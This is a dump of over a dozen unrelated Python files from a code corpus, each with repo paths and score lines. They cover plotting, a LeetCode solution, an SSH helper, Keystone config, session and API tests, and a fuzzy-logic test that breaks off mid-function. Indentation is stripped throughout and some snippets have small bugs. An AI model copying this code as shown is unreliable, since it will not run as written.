print(data[0].shape, data[1].shape, data[2], data[3][0])
frame, mask, num_obj = data[0][0], data[1][0], data[2][0]
frame, mask = frame[:3], mask[:3]
print(torch.max(mask), torch.min(mask))
fig = plt.figure()
for j in range(frame.shape[0]):
ax = fig.add_subplot(2, 3, i*6+j+1)
ax.axis('off')
ax.imshow(frame[j].numpy().transpose(1, 2, 0))
plt.pause(0.01)
for k in range(mask.shape[0]):
ax = fig.add_subplot(2, 3, i*6+4+k)
ax.axis('off')
# ax.imshow(np.array(mask[k, 0], dtype=np.uint8))
ax.imshow(convert_one_hot(np.array(mask[k],dtype=np.uint8).transpose(1, 2, 0), num_obj.item()))
plt.pause(0.01)
# plt.imsave('test{}.png'.format(k), convert_one_hot(np.array(mask[k],dtype=np.uint8).transpose(1, 2, 0), num_obj.item()))
fig.savefig("test.png") | 2.21875 | 2 |
code/ch17/17.1.1.majorityElement.py | leetcode-pp/leetcode-pp1 | 22 | 12797967 | <gh_stars>10-100
class Solution:
def majorityElement(self, nums: List[int]) -> List[int]:
n = len(nums)
res = []
cnt1 = 0
cnt2 = 0
n1 = None
n2 = None
# 筛选出现次数最多的前两个
for num in nums:
if num == n1:
cnt1 += 1
elif num == n2:
cnt2 += 1
elif cnt1 == 0:
n1 = num
cnt1 += 1
elif cnt2 == 0:
n2 = num
cnt2 += 1
else:
cnt1 -= 1
cnt2 -= 1
# 筛选出现次数超过三分之一的
# 这里的cnt1和cnt2的含义已经变了
# 这里的cnt1和cnt2表示的是出现次数, 而上面的则不是
cnt1 = 0
cnt2 = 0
for num in nums:
if num == n1:
cnt1 += 1
if num == n2:
cnt2 += 1
if cnt1 > n // 3:
res.append(n1)
if cnt2 > n // 3:
res.append(n2)
return res
| 2.984375 | 3 |
common/code/snippets/txt/ssh.py | nevesnunes/env | 4 | 12797968 | <filename>common/code/snippets/txt/ssh.py
import paramiko
import datetime
import subprocess # run it locally if you want, use this for Bash commands
def run_netflow_cmd(command):
rwflow_server_ip = "192.168.3.11" # SiLK box
user_name="netflow"
keyfile="/home/marius/.ssh/id_rsa"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(rwflow_server_ip, username=user_name, key_filename=keyfile)
stdin, stdout, stderr = ssh.exec_command(command + "&& echo 'done'")
for line in stderr.readlines():
print line
for line in stdout.readlines():
# print line
exit_status = stdout.channel.recv_exit_status() # Blocking call
if exit_status == 0:
print str(datetime.datetime.today()) + ": Command finished successfully."
else:
print("Error", exit_status)
ssh.close()
| 2.59375 | 3 |
models/inclusive_gateway.py | THM-MA/XSDATA-waypoint | 0 | 12797969 | from dataclasses import dataclass
from .t_inclusive_gateway import TInclusiveGateway
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
@dataclass
class InclusiveGateway(TInclusiveGateway):
class Meta:
name = "inclusiveGateway"
namespace = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 1.921875 | 2 |
tests/testArUco.py | snavas/PyMote | 3 | 12797970 | <reponame>snavas/PyMote
import numpy as np
import cv2
from cv2 import aruco
# https://mecaruco2.readthedocs.io/en/latest/notebooks_rst/Aruco/Aruco.html
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
image = cv2.imread("../tests/aruco.jpg")
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
parameters = aruco.DetectorParameters_create()
corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)
frame_markers = aruco.drawDetectedMarkers(image.copy(), corners, ids)
for i in range(len(ids)):
c = corners[i][0]
#lt.plot([c[:, 0].mean()], [c[:, 1].mean()], "o", label="id={0}".format(ids[i]))
print(c)
images_H1 = np.hstack((image, frame_markers))
images_H2 = np.hstack((image, frame_markers))
images = np.vstack((images_H1, images_H2))
cv2.imshow('ARUCO', images_H1)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 2.546875 | 3 |
ls-tree/python/main.py | danielo515/explore-new-languages | 0 | 12797971 | import os
from os import listdir
from argparse import ArgumentParser
from os.path import isdir,join
middle = '├'
pipe = '│'
last = '└'
scale = 2
def traverse(path, parents='', depth=0, isLast=True):
tree = [(path, parents, depth, isLast)]
realPath = join(parents,path)
files = listdir(realPath)
maxFiles = len(files)
for idx,file in enumerate(files):
curPath = join(realPath,file)
isLast = idx == maxFiles -1
if isdir(curPath):
tree = tree + (traverse(file,realPath, depth+1, isLast))
else:
tree.append((file, parents, depth+1, isLast))
return tree
def addDepth(depth,connections,spacer=" "):
return "".join([pipe if x in connections else spacer for x in range(0, depth)])
def findConnections(depth, below):
depths = []
for (_,_,curDepth,_) in below:
if curDepth < depth:
depths.append(curDepth)
depth=curDepth
return depths
def prettyPrint(treeInfo):
for idx,node in enumerate(treeInfo):
(name, parents, depth, isLast) = node
prefix = last if isLast else middle
connections = [x*scale for x in findConnections(depth,treeInfo[idx:])]
print("%s%s %s"%(addDepth(depth*scale,connections), prefix, name))
parser = ArgumentParser(description="list a folder as a tree")
parser.add_argument("folder",default="./", type=str)
args = parser.parse_args()
folderInfo = traverse(args.folder)
print(prettyPrint(folderInfo))
| 3.203125 | 3 |
keystone/config.py | savi-dev/keystone | 0 | 12797972 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
import os
import sys
from keystone.common import logging
from keystone.openstack.common import cfg
gettext.install('keystone', unicode=1)
CONF = cfg.CONF
def setup_logging(conf):
"""
Sets up the logging options for a log with supplied name
:param conf: a cfg.ConfOpts object
"""
if conf.log_config:
# Use a logging configuration file for all settings...
if os.path.exists(conf.log_config):
logging.config.fileConfig(conf.log_config)
return
else:
raise RuntimeError('Unable to locate specified logging '
'config file: %s' % conf.log_config)
root_logger = logging.root
if conf.debug:
root_logger.setLevel(logging.DEBUG)
elif conf.verbose:
root_logger.setLevel(logging.INFO)
else:
root_logger.setLevel(logging.WARNING)
formatter = logging.Formatter(conf.log_format, conf.log_date_format)
if conf.use_syslog:
try:
facility = getattr(logging.SysLogHandler,
conf.syslog_log_facility)
except AttributeError:
raise ValueError(_('Invalid syslog facility'))
handler = logging.SysLogHandler(address='/dev/log',
facility=facility)
elif conf.log_file:
logfile = conf.log_file
if conf.log_dir:
logfile = os.path.join(conf.log_dir, logfile)
handler = logging.WatchedFileHandler(logfile)
else:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
root_logger.addHandler(handler)
def register_str(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.StrOpt(*args, **kw), group=group)
def register_cli_str(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.StrOpt(*args, **kw), group=group)
def register_bool(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.BoolOpt(*args, **kw), group=group)
def register_cli_bool(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.BoolOpt(*args, **kw), group=group)
def register_int(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.IntOpt(*args, **kw), group=group)
def register_cli_int(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.IntOpt(*args, **kw), group=group)
register_str('admin_token', default='ADMIN')
register_str('bind_host', default='0.0.0.0')
register_str('compute_port', default=8774)
register_str('admin_port', default=35357)
register_str('public_port', default=5000)
register_str('onready')
register_str('auth_admin_prefix', default='')
#ssl options
register_bool('enable', group='ssl', default=False)
register_str('certfile', group='ssl', default=None)
register_str('keyfile', group='ssl', default=None)
register_str('ca_certs', group='ssl', default=None)
register_bool('cert_required', group='ssl', default=False)
#signing options
register_str('token_format', group='signing',
default="UUID")
register_str('certfile', group='signing',
default="/etc/keystone/ssl/certs/signing_cert.pem")
register_str('keyfile', group='signing',
default="/etc/keystone/ssl/private/signing_key.pem")
register_str('ca_certs', group='signing',
default="/etc/keystone/ssl/certs/ca.pem")
register_int('key_size', group='signing', default=1024)
register_int('valid_days', group='signing', default=3650)
register_str('ca_password', group='signing', default=None)
# sql options
register_str('connection', group='sql', default='sqlite:///keystone.db')
register_int('idle_timeout', group='sql', default=200)
register_str('driver', group='catalog',
default='keystone.catalog.backends.sql.Catalog')
register_str('driver', group='identity',
default='keystone.identity.backends.sql.Identity')
register_str('driver', group='policy',
default='keystone.policy.backends.rules.Policy')
register_str('driver', group='token',
default='keystone.token.backends.kvs.Token')
register_str('driver', group='ec2',
default='keystone.contrib.ec2.backends.kvs.Ec2')
register_str('driver', group='stats',
default='keystone.contrib.stats.backends.kvs.Stats')
#ldap
register_str('url', group='ldap', default='ldap://localhost')
register_str('user', group='ldap', default='dc=Manager,dc=example,dc=com')
register_str('password', group='ldap', default='<PASSWORD>')
register_str('suffix', group='ldap', default='cn=example,cn=com')
register_bool('use_dumb_member', group='ldap', default=False)
register_str('user_name_attribute', group='ldap', default='sn')
register_str('user_tree_dn', group='ldap', default=None)
register_str('user_objectclass', group='ldap', default='inetOrgPerson')
register_str('user_id_attribute', group='ldap', default='cn')
register_str('tenant_tree_dn', group='ldap', default=None)
register_str('tenant_objectclass', group='ldap', default='groupOfNames')
register_str('tenant_id_attribute', group='ldap', default='cn')
register_str('tenant_member_attribute', group='ldap', default='member')
register_str('tenant_name_attribute', group='ldap', default='ou')
register_str('role_tree_dn', group='ldap', default=None)
register_str('role_objectclass', group='ldap', default='organizationalRole')
register_str('role_id_attribute', group='ldap', default='cn')
register_str('role_member_attribute', group='ldap', default='roleOccupant')
#pam
register_str('url', group='pam', default=None)
register_str('userid', group='pam', default=None)
register_str('password', group='pam', default=None)
| 1.976563 | 2 |
backend/tests/session/test_session_login_user.py | fjacob21/mididecweb | 0 | 12797973 | from datetime import datetime, timedelta
import pytz
from bcrypt_hash import BcryptHash
import pytest
from src.users import Users
from src.events import Events
from src.stores import MemoryStore
from src.session import Session
def test_login_user():
store = MemoryStore()
users = Users(store)
params = {}
params['password'] = 'password'
session = Session(params, store, '')
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
user.validated = True
with pytest.raises(Exception):
session.login('')
loging_dict = session.login('test')
assert loging_dict
assert 'user' in loging_dict
def test_login_user_bad_password():
store = MemoryStore()
users = Users(store)
params = {}
params['password'] = '<PASSWORD>'
session = Session(params, store, '')
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
user.validated = True
with pytest.raises(Exception):
session.login('test')
def test_login_user_register():
store = MemoryStore()
users = Users(store)
events = Events(store)
start = datetime.now(pytz.timezone("America/New_York"))
dur = timedelta(hours=1)
params = {}
params['password'] = 'password'
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
events.add('test', 'test', 30, start, dur, 'test', 'test',
'<EMAIL>', 'test', user)
user.validated = True
params['register'] = 'test'
session = Session(params, store, '')
loging_dict = session.login('test')
assert loging_dict
assert 'user' in loging_dict
assert 'register' in loging_dict
assert loging_dict['register'] == 'test'
def test_login_user_register_bad_event():
store = MemoryStore()
users = Users(store)
events = Events(store)
start = datetime.now(pytz.timezone("America/New_York"))
dur = timedelta(hours=1)
params = {}
params['password'] = 'password'
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
events.add('test', 'test', 30, start, dur, 'test', 'test',
'<EMAIL>', 'test', user)
user.validated = True
params['register'] = ''
session = Session(params, store, '')
with pytest.raises(Exception):
session.login('test')
| 2.265625 | 2 |
tests/unit/test_sessions.py | irvansemestanya/vault-cli | 52 | 12797974 | <reponame>irvansemestanya/vault-cli<filename>tests/unit/test_sessions.py<gh_stars>10-100
import os
import pytest
from vault_cli import sessions
@pytest.fixture
def reset_requests_ca_bundle():
requests_ca_bundle = os.environ.get("REQUESTS_CA_BUNDLE")
os.environ.pop("REQUESTS_CA_BUNDLE", None)
yield
if requests_ca_bundle is not None:
os.environ["REQUESTS_CA_BUNDLE"] = requests_ca_bundle
else:
os.environ.pop("REQUESTS_CA_BUNDLE", None)
@pytest.mark.parametrize(
"verify, envvar, expected, expected_with_requests",
[
(None, None, True, True),
(True, None, True, True),
(False, None, False, False),
("blu", None, "blu", "blu"),
(None, "bla", "bla", "bla"),
(True, "bla", "bla", "bla"),
(False, "bla", False, "bla"), # This is the case we're supposedly fixing
(
"blu",
"bla",
"bla",
"bla",
), # This might be surprising but it's not important.
],
)
def test_session(
reset_requests_ca_bundle,
requests_mock,
verify,
envvar,
expected,
expected_with_requests,
):
requests_mock.get("https://bla")
import requests
vault_cli_session = sessions.Session()
requests_session = requests.Session()
if envvar is not None:
os.environ["REQUESTS_CA_BUNDLE"] = envvar
if verify is not None:
vault_cli_session.verify = verify
requests_session.verify = verify
vault_cli_session.get("https://bla")
# If this tests fails here, it means the Session workaround doesn't
# work anymore
assert requests_mock.last_request.verify == expected
requests_session.get("https://bla")
# If this tests fails here, it means requests have solved the bug
# and we don't need a workaround anymore
assert requests_mock.last_request.verify == expected_with_requests
| 2.046875 | 2 |
tensorflow/contrib/distributions/python/kernel_tests/estimator_test.py | tianyapiaozi/tensorflow | 848 | 12797975 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.distributions.python.ops import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_metrics
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_no_variables
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_summary_tags
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
class EstimatorHeadDistributionRegressionTest(test.TestCase):
def _assert_output_alternatives(self, model_fn_ops):
self.assertEquals({
None: constants.ProblemType.LINEAR_REGRESSION
}, {
k: v[0] for k, v in six.iteritems(model_fn_ops.output_alternatives)
})
def testNormalLocScaleLogits(self):
# We will bias logits[..., 1] so that: logits[..., 1]=0 implies scale=1.
scale_bias = np.log(np.expm1(1.))
def softplus(x):
return np.log1p(np.exp(x))
def actual_loss(logits, labels):
mu = actual_mean(logits)
sigma = actual_stddev(logits)
labels = np.squeeze(labels, -1)
z = (labels - mu) / sigma
loss = 0.5 * (z**2. + np.log(2. * np.pi)) + np.log(sigma)
return loss.mean()
def actual_mean(logits):
return logits[..., 0]
def actual_stddev(logits):
return softplus(logits[..., 1] + scale_bias)
def make_distribution_fn(logits):
return normal_lib.Normal(
loc=logits[..., 0],
scale=nn_ops.softplus(logits[..., 1] + scale_bias))
head = estimator_lib.estimator_head_distribution_regression(
make_distribution_fn,
logits_dimension=2)
labels = np.float32([[-1.],
[0.],
[1.]])
logits = np.float32([[0., -1],
[1, 0.5],
[-1, 1]])
with ops.Graph().as_default(), session.Session():
# Convert to tensor so we can index into head.distributions.
tflogits = ops.convert_to_tensor(logits, name="logits")
model_fn_ops = head.create_model_fn_ops(
{},
labels=labels,
mode=model_fn.ModeKeys.TRAIN,
train_op_fn=head_lib.no_op_train_fn,
logits=tflogits)
self._assert_output_alternatives(model_fn_ops)
_assert_summary_tags(self, ["loss"])
_assert_no_variables(self)
loss = actual_loss(logits, labels)
_assert_metrics(self, loss, {"loss": loss}, model_fn_ops)
# Now we verify the underlying distribution was correctly constructed.
expected_mean = logits[..., 0]
self.assertAllClose(
expected_mean,
head.distribution(tflogits).mean().eval(),
rtol=1e-6, atol=0.)
expected_stddev = softplus(logits[..., 1] + scale_bias)
self.assertAllClose(
expected_stddev,
head.distribution(tflogits).stddev().eval(),
rtol=1e-6, atol=0.)
# Should have created only one distribution.
self.assertEqual(1, len(head.distributions))
if __name__ == "__main__":
test.main()
| 1.789063 | 2 |
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
profile = Profile.objects.get_profile_by_user(email)
info = {}
info['email'] = email
info['name'] = email2nickname(email)
info['contact_email'] = profile.contact_email if profile and profile.contact_email else ''
return info
class OrgAdminUser(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
throttle_classes = (UserRateThrottle,)
permission_classes = (IsProVersion,)
def put(self, request, org_id, email):
""" update name of an org user.
Permission checking:
1. only admin can perform this action.
"""
# resource check
org_id = int(org_id)
if not ccnet_api.get_org_by_id(org_id):
error_msg = 'Organization %s not found.' % org_id
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
error_msg = 'User %s not found.' % email
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
# permission check
if not request.user.org.is_staff:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if request.user.org.org_id != org_id:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if not is_org_user(email, org_id):
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
# update user's name
name = request.data.get("name", None)
if name is not None:
name = name.strip()
if len(name) > 64:
error_msg = 'Name is too long (maximum is 64 characters).'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
if "/" in name:
error_msg = "Name should not include '/'."
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, nickname=name)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
# update user's contact email
contact_email = request.data.get("contact_email", None)
if contact_email is not None:
contact_email = contact_email.strip()
if contact_email != '' and not is_valid_email(contact_email):
error_msg = 'contact_email invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, contact_email=contact_email)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
info = get_user_info(email)
info['is_active'] = user.is_active
return Response(info)
| 1.9375 | 2 |
perfect.py | CrownCrafter/School | 0 | 12797977 | <filename>perfect.py
#!/usr/bin/env python3
x = int(input("Enter number "))
p = x
i = 1
sum = 0
while(True):
if(x // (10 ** i) == 0):
dig = i
break
i += 1
i = 1
factors=[]
while(i < x):
if(x % i == 0):
factors.append(i)
i += 1
for i in range(0, len(factors)):
sum += factors[i]
if(sum == x):
print("It is perfect number")
else:
print("It is not a perfect number")
| 3.875 | 4 |
app/recommendation/migrations/0003_auto_20181115_2259.py | A2ed/affective-recommendation | 0 | 12797978 | <gh_stars>0
# Generated by Django 2.1.3 on 2018-11-15 22:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommendation', '0002_auto_20181115_2204'),
]
operations = [
migrations.RemoveField(
model_name='state',
name='user_id',
),
migrations.AlterField(
model_name='state',
name='name',
field=models.CharField(blank=True, max_length=50),
),
]
| 1.40625 | 1 |
helpers/move_detection.py | playingwithai/rock_paper_scissors_part3 | 0 | 12797979 | import logging
import os
from enum import Enum
from imageai.Prediction.Custom import CustomImagePrediction
# Show only errors in console
logging.getLogger("tensorflow").setLevel(logging.ERROR)
class MovesEnum(int, Enum):
ROCK = 0
PAPER = 1
SCISSORS = 2
class ModelTypeEnum(Enum):
"""
An helper enum to help for model type choice
"""
RESNET = 0
SQEEZENET = 1
INCEPTIONV3 = 2
DENSENET = 3
class RockPaperScissorsPredictor:
"""
This class contains the required code for model training and move prediction using a
webcam
"""
MODEL_TYPE_SET_LOOKUP = {
ModelTypeEnum.RESNET: lambda x: x.setModelTypeAsResNet(),
ModelTypeEnum.SQEEZENET: lambda x: x.setModelTypeAsSqueezeNet(),
ModelTypeEnum.INCEPTIONV3: lambda x: x.setModelTypeAsInceptionV3(),
ModelTypeEnum.DENSENET: lambda x: x.setModelTypeAsDenseNet(),
}
MOVES_LOOKUP = {
"rock": MovesEnum.ROCK,
"paper": MovesEnum.PAPER,
"scissors": MovesEnum.SCISSORS,
}
def __init__(
self,
model_type=ModelTypeEnum.RESNET,
class_number=3, # We have 3 different objects: "rock", "paper", "scissors"
):
self.model_type = model_type
self.class_number = class_number
self.base_path = os.getcwd()
# Instantiate the CustomImagePrediction object that will predict our moves
self.predictor = CustomImagePrediction()
# Set the model type of the neural network (it must be the same of the training)
self._set_proper_model_type(self.model_type)
# Set path to the trained model file
self.predictor.setModelPath(
os.path.join(self.base_path, "data", "move_detector", "model.h5")
)
# Set path to the json file that contains our classes and their labels
self.predictor.setJsonPath(
os.path.join(self.base_path, "data", "move_detector", "model_class.json")
)
# Load the trained model and set it to use "class_number" classes
self.predictor.loadModel(num_objects=self.class_number)
def _set_proper_model_type(self, model_type):
self.MODEL_TYPE_SET_LOOKUP[model_type](self.predictor)
def detect_move_from_picture(self, picture, sensibility=90):
predictions, probabilities = self.predictor.predictImage(
picture, result_count=3, input_type="array"
)
# Get a tuple (class_predicted, probability) that contains the best
# prediction
best_prediction = max(
zip(predictions, probabilities), key=lambda x: x[1]
)
if best_prediction[1] < sensibility:
return
return self.MOVES_LOOKUP[best_prediction[0]]
| 2.890625 | 3 |
fuzzy_modeling/tests/models/test_system_model.py | arruda/cloudfuzzy | 2 | 12797980 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import inspect
import mock
from django.test import TestCase
from fuzzy_modeling.tests.utils import ResetMock
from fuzzy_modeling.models.systems import SystemModel
from fuzzy.System import System
class SystemModelTest(TestCase, ResetMock):
def setUp(self):
# self.aluno = mommy.make_one(Aluno)
# from fuzzy_modeling.models.systems import SystemModel as SystemModelOriginal
# import pdb; pdb.set_trace()
# reset_mock(SystemModel,'inputvariablemodel_set')
# reset_mock(SystemModel,'outputvariablemodel_set')
# reset_mock(SystemModel,'rulemodel_set')
pass
def tearDown(self):
"""And kill it when done"""
self.reset_all_pre_mocks(SystemModel)
def _named_and_pyfuzzymixin_mock(self, name):
"""
mock a variable or to be an object that has attr name and a get_pyfuzzy that returns this name
"""
var = mock.Mock()
var.name = name
var.get_pyfuzzy = lambda systme=None: name
return var
def _mock_systemModel(self):
self.system_description = "System description"
self.system = SystemModel(description=self.system_description)
self.input_variable_mock = [
self._named_and_pyfuzzymixin_mock("iv%d" % i)
for i in xrange(1,2)
]
self.output_variable_mock = [
self._named_and_pyfuzzymixin_mock("ov%d" % i)
for i in xrange(1,2)
]
self.rules_mock = [
self._named_and_pyfuzzymixin_mock("r%d" % i)
for i in xrange(1,2)
]
# mocking inputvariablemodel_set
# inputvariablemodel_set = lambda : None
inputvariablemodel_set = mock.Mock()
inputvariablemodel_set.all = lambda : self.input_variable_mock
self.set_pre_mock(SystemModel,'inputvariablemodel_set')
SystemModel.inputvariablemodel_set = inputvariablemodel_set
# mocking outputvariablemodel_set
outputvariablemodel_set = mock.Mock()
outputvariablemodel_set.all = lambda : self.output_variable_mock
self.set_pre_mock(SystemModel,'outputvariablemodel_set')
SystemModel.outputvariablemodel_set = outputvariablemodel_set
# mocking rulemodel_set
rulemodel_set = mock.Mock()
rulemodel_set.all = lambda : self.rules_mock
self.set_pre_mock(SystemModel,'rulemodel_set')
SystemModel.rulemodel_set = rulemodel_set
return self.system
def test_system_get_pyfuzzy(self):
" shoud return the correct corresponding pyfuzzy object "
new_system = self._mock_systemModel()
new_pyfuzzy_system = new_system.get_pyfuzzy()
# the expected pyfuzzy system
pyfuzzy_system_expected = System(self.system_description)
variable_dict = { var.name : var.get_pyfuzzy() for var in self.input_variable_mock + self.output_variable_mock }
pyfuzzy_system_expected.variables = variable_dict
rules_dict = { rule.name : rule.get_pyfuzzy() for rule in self.rules_mock }
pyfuzzy_system_expected.rules = rules_dict
self.assertEquals(pyfuzzy_system_expected.description, new_pyfuzzy_system.description)
self.assertDictEqual(pyfuzzy_system_expected.variables, new_pyfuzzy_system.variables)
self.assertDictEqual(pyfuzzy_system_expected.rules, new_pyfuzzy_system.rules)
@classmethod
def _createSystem(cls):
import fuzzy.System
system = fuzzy.System.System(description=
"""This fuzzy system is to control the inverted pendulum into an upright position as well as
at the position X=0.
It also is used to demonstrate some features of pyfuzzy.
This is the reason, it uses different fuzzy norm in normally
symmetrical rules.""")
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.fuzzify.Plain import Plain
from fuzzy.defuzzify.COG import COG
# set defuzzification method and default norms
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
CER = AlgebraicProduct()
COG = COG(INF=INF,ACC=ACC,failsafe = 0., segment_size=0.5)
from fuzzy.InputVariable import InputVariable
from fuzzy.OutputVariable import OutputVariable
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
angle = InputVariable(fuzzify=Plain(),description='angle',min=0.,max=360.,unit='degrees')
system.variables['Phi'] = angle
angle.adjectives['up_more_right'] = Adjective(Polygon([(0.,0.),(30.,1.),(60.,0.)]))
angle.adjectives['up_right'] = Adjective(Polygon([(30.,0.),(60.,1.),(90.,0.)]))
angle.adjectives['up'] = Adjective(Polygon([(60.,0.),(90.,1.),(120.,0.)]))
angle.adjectives['up_left'] = Adjective(Polygon([(90.,0.),(120.,1.),(150.,0.)]))
angle.adjectives['up_more_left'] = Adjective(Polygon([(120.,0.),(150.,1.),(180.,0.)]))
angle.adjectives['down_more_left'] = Adjective(Polygon([(180.,0.),(210.,1.),(240.,0.)]))
angle.adjectives['down_left'] = Adjective(Polygon([(210.,0.),(240.,1.),(270.,0.)]))
angle.adjectives['down'] = Adjective(Polygon([(240.,0.),(270.,1.),(300.,0.)]))
angle.adjectives['down_right'] = Adjective(Polygon([(270.,0.),(300.,1.),(330.,0.)]))
angle.adjectives['down_more_right'] = Adjective(Polygon([(300.,0.),(330.,1.),(360.,0.)]))
angle_velocity = InputVariable(fuzzify=Plain(),description='angle velocity',min=-600.,max=600.,unit='degrees per second')
system.variables['dPhi_dT'] = angle_velocity
angle_velocity.adjectives['cw_fast'] = Adjective(Polygon([(-600.,1.),(-300.,0.)]))
angle_velocity.adjectives['cw_slow'] = Adjective(Polygon([(-600.,0.),(-300.,1.),(0.,0.)]))
angle_velocity.adjectives['stop'] = Adjective(Polygon([(-300.,0.),(0.,1.),(300.,0.)]))
angle_velocity.adjectives['ccw_slow'] = Adjective(Polygon([(0.,0.),(300.,1.),(600.,0.)]))
angle_velocity.adjectives['ccw_fast'] = Adjective(Polygon([(300.,0.),(600.,1.)]))
position = InputVariable(fuzzify=Plain(),description='position',min=-20.,max=20.,unit='meter')
system.variables['X'] = position
position.adjectives['left_far'] = Adjective(Polygon([(-20.,1.),(-10.,0.)]))
position.adjectives['left_near'] = Adjective(Polygon([(-20.,0.),(-5.,1.),(0.,0.)]))
position.adjectives['stop'] = Adjective(Polygon([(-5.,0.),(0.,1.),(5.,0.)]))
position.adjectives['right_near'] = Adjective(Polygon([(0.,0.),(5.,1.),(20.,0.)]))
position.adjectives['right_far'] = Adjective(Polygon([(10.,0.),(20.,1.)]))
velocity = InputVariable(fuzzify=Plain(),description='velocity',min=-10.,max=10.,unit='meter per second')
system.variables['dX_dT'] = velocity
velocity.adjectives['left_fast'] = Adjective(Polygon([(-10.,1.),(-5.,0.)]))
velocity.adjectives['left_slow'] = Adjective(Polygon([(-10.,0.),(-2.,1.),(0.,0.)]))
velocity.adjectives['stop'] = Adjective(Polygon([(-2.,0.),(0.,1.),(2.,0.)]))
velocity.adjectives['right_slow'] = Adjective(Polygon([(0.,0.),(2.,1.),(10.,0.)]))
velocity.adjectives['right_fast'] = Adjective(Polygon([(5.,0.),(10.,1.)]))
acceleration = OutputVariable(defuzzify=COG,description='acceleration',min=-50.,max=50.,unit='meter per second^2')
system.variables['a'] = acceleration
acceleration.adjectives['left_fast'] = a_left_fast = Adjective(Polygon([(-50.,0.),(-20.,1.),(-10.,0.)]),COM=COM)
acceleration.adjectives['left_slow'] = a_left_slow = Adjective(Polygon([(-20.,0.),(-10.,1.),(0.,0.)]),COM=COM)
